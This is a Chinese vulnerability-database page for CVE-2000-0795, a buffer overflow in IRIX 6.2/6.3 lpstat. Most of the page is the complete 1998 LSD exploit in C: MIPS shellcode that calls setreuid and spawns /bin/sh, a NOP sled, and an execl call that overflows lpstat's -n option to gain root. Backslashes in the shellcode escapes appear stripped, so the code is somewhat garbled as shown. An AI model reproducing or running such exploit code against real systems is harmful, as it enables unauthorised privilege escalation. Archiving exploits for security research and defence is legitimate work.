IRIX缓冲区溢出漏洞

IRIX缓冲区溢出漏洞

漏洞ID 1105383 漏洞类型 缓冲区溢出
发布时间 1998-11-01 更新时间 2005-05-02
图片[1]-IRIX缓冲区溢出漏洞-安全小百科CVE编号 CVE-2000-0795
图片[2]-IRIX缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200010-117
漏洞平台 IRIX CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/20129
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200010-117
|漏洞详情
IRIX6.2版本和6.3版本中lpstat存在缓冲区溢出漏洞。本地用户可以借助超长-n选项来提升根特权。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/1529/info

Certain versions of IRIX ship with a version of lpstat which is vulnerable to a buffer overflow attack. The program, lpstat, is used to check the status of the printer being used by the IRIX machine. The problem is in the command line parsing section of the code whereby a user can supply an overly long string and overflow the buffer resulting in a possible root compromise. 
*/

/*## copyright LAST STAGE OF DELIRIUM nov 1998 poland        *://lsd-pl.net/ #*/
/*## /bin/lpstat                                                             #*/

#define NOPNUM 468
#define ADRNUM 300
#define PCHNUM 300

char setreuidcode[]=
    "x30x0bxffxff"    /* andi    $t3,$zero,0xffff     */
    "x24x02x04x01"    /* li      $v0,1024+1           */
    "x20x42xffxff"    /* addi    $v0,$v0,-1           */
    "x03xffxffxcc"    /* syscall                      */
    "x30x44xffxff"    /* andi    $a0,$v0,0xffff       */
    "x31x65xffxff"    /* andi    $a1,$t3,0xffff       */
    "x24x02x04x64"    /* li      $v0,1124             */
    "x03xffxffxcc"    /* syscall                      */
;

char shellcode[]=
    "x04x10xffxff"    /* bltzal  $zero,<shellcode>    */
    "x24x02x03xf3"    /* li      $v0,1011             */
    "x23xffx01x14"    /* addi    $ra,$ra,276          */
    "x23xe4xffx08"    /* addi    $a0,$ra,-248         */
    "x23xe5xffx10"    /* addi    $a1,$ra,-240         */
    "xafxe4xffx10"    /* sw      $a0,-240($ra)        */
    "xafxe0xffx14"    /* sw      $zero,-236($ra)      */
    "xa3xe0xffx0f"    /* sb      $zero,-241($ra)      */
    "x03xffxffxcc"    /* syscall                      */
    "/bin/sh"
;

char jump[]=
    "x03xa0x10x25"    /* move    $v0,$sp              */
    "x03xe0x00x08"    /* jr      $ra                  */
;

char nop[]="x24x0fx12x34";

main(int argc,char **argv){
    char buffer[10000],adr[4],pch[4],*b;
    int i;

    printf("copyright LAST STAGE OF DELIRIUM nov 1998 poland  //lsd-pl.net/n");
    printf("/bin/lpstat for irix 6.2 6.3 IP:17,19,20,21,22,32nn");

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+8888+1364+140-15012;
    *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+8888+140+544+32748;

    b=buffer;
    *b++=0xff;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
    *b=0;

    execl("/bin/lpstat","lsd","-n",buffer,0);
}
|参考资料

来源:BUGTRAQ
名称:20000802[LSD]someunpublishedLSDexploitcodes
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
来源:BID
名称:1529
链接:http://www.securityfocus.com/bid/1529
来源:OSVDB
名称:1485
链接:http://www.osvdb.org/1485

相关推荐: PeerSec MatrixSSL会话劫持漏洞

PeerSec MatrixSSL会话劫持漏洞 漏洞ID 1200485 漏洞类型 未知 发布时间 2004-12-31 更新时间 2004-12-31 CVE编号 CVE-2004-2681 CNNVD-ID CNNVD-200412-810 漏洞平台 N/…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享